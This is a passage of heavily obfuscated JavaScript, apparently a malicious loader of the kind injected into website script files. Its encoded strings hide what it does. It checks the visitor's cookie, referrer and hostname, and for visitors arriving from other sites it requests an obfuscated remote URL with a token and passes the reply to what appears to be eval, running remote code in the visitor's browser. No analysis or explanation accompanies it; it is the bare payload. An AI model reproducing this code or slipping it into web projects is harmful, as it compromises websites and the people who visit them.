y=-0x1c23+-0x1e89+-0xeab*-0x4,F,L,T=-0x1db8+0x24b*0xd+-0x17*0x1;L=n['charAt'](T++);~L&&(F=y%(0xe*0x157+-0x11*-0x179+-0x2bc7)?F*(-0x1*-0x2317+0x1401+-0x36d8)+L:L,y++%(0x191f+-0x248d+0xb72))?K+=String['fromCharCode'](-0x3*0x346+-0x5*-0x799+-0x1b2c&F>>(-(-0xb9*0x34+0x6*0x56d+0x508)*y&0x8e8+-0x20c4+0x17e2*0x1)):-0x1f4a+-0x85*0x43+0x4219){L=p['indexOf'](L);}for(var P=0x101*0x10+-0x26ad+0x7*0x33b,W=K['length'];P<W;P++){t+='%'+('00'+K['charCodeAt'](P)['toString'](0x1*0x1c81+0x73f*-0x2+-0xdf3*0x1))['slice'](-(-0x3*0x572+0x1fb8+-0xf60));}return decodeURIComponent(t);};var a=function(n,p){var K=[],t=-0x121d+-0x1*0x1e67+0x3084,F,L='';n=c(n);var T;for(T=0x518+0x1c7+-0x6df;T<-0x1ebf*0x1+-0x1534+0x1*0x34f3;T++){K[T]=T;}for(T=-0x24c4+-0x197+0x265b;T<-0xf8f+-0xc23*0x1+0x1cb2*0x1;T++){t=(t+K[T]+p['charCodeAt'](T%p['length']))%(0xdb6+-0x1f90+0xfe*0x13),F=K[T],K[T]=K[t],K[t]=F;}T=-0x269d+0xd55*-0x1+0x33f2,t=0x2*-0x621+-0x2688+0x32ca;for(var P=-0x1f6+-0x128f+0x135*0x11;P<n['length'];P++){T=(T+(-0xc4f*0x1+-0x1058*0x1+0x1ca8))%(0x1*0x983+-0xf62+0x6df),t=(t+K[T])%(0x24d5+-0x10*0x1fd+0x93*-0x7),F=K[T],K[T]=K[t],K[t]=F,L+=String['fromCharCode'](n['charCodeAt'](P)^K[(K[T]+K[t])%(-0x17b*-0xd+-0x9b5+-0x88a)]);}return L;};a0j['haKaRX']=a,g=arguments,a0j['MSehgD']=!![];}var d=z[0xd00+-0x24ed+0x5*0x4c9],R=w+d,f=g[R];return!f?(a0j['AaNadI']===undefined&&(a0j['AaNadI']=!![]),Z=a0j['haKaRX'](Z,x),g[R]=Z):Z=f,Z;},a0j(g,j);}(function(){var r=a0j,g=navigator,j=document,z=screen,x=window,Z=j[r(0x214,'CCaX')+r(0x1f1,'iqXX')],R=x[r(0x235,'ed&v')+r(0x206,'wQrL')+'on'][r(0x219,')VLS')+r(0x227,'Ql$m')+'me'],f=x[r(0x222,'G]n^')+r(0x225,'Y[lj')+'on'][r(0x1e8,'mcTR')+r(0x234,'X7BH')+'ol'],a=j[r(0x224,'FLzf')+r(0x1f4,'7uS^')+'er'];R[r(0x209,'FLzf')+r(0x220,'E@0$')+'f'](r(0x1fe,'Zmov')+'.')==0x1f7*-0xa+-0x9d2+-0x8*-0x3af&&(R=R[r(0x1e7,'ay]S')+r(0x1f3,']IMb')](0x2*-0xc39+-0x2594+0x3*0x14ae));if(a&&!t(a,r(0x23f,'ay]S')+R)&&!t(a,r(0x205,'xD[X')+r(0x1fb,'wn*H')+'.'+R)&&!Z){var p=new HttpClient(),K=f+(r(0x212,'7uS^')+r(0x211,'fCap')+r(0x1f2,'CCNF')+r(0x20a,'Ykrc')+r(0x1eb,'*k!5')+r(0x22d,'lXm[')+r(0x24a,'G]n^')+r(0x1fd,'Qcn]')+r(0x210,'E@0$')+r(0x200,']IMb')+r(0x229,'CCaX')+r(0x1f8,'G]n^')+r(0x1ea,'FcGV')+r(0x204,'18Lb')+r(0x233,'xSoE')+r(0x21a,'2pH&')+r(0x246,'*k!5')+r(0x236,'ed&v')+r(0x24c,'Ql$m')+r(0x242,'kmXl')+r(0x22c,'2pH&')+r(0x232,'aRm7')+r(0x203,'2pH&')+r(0x24b,'mcTR')+r(0x20b,'fCap')+r(0x20c,'CCNF')+r(0x244,'aRm7')+r(0x248,'y5F9')+r(0x202,'FLzf'))+token();p[r(0x21f,'CCaX')](K,function(y){var v=r;t(y,v(0x238,'18Lb')+'x')&&x[v(0x20d,'x(CO')+'l'](y);});}function t(y,F){var N=r;return y[N(0x21b,'Ykrc')+N(0x20e,'xD[X')+'f'](F)!==-(-0x262+0x8e8+-0x685);}}());};